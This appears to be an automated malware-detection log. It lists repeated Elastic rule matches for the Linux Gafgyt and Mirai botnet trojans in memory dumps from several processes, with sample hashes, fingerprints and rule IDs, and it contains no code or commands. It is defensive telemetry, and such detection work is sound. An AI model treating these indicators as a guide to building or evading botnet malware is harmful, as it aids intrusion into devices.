Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6227.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6234.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6229.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
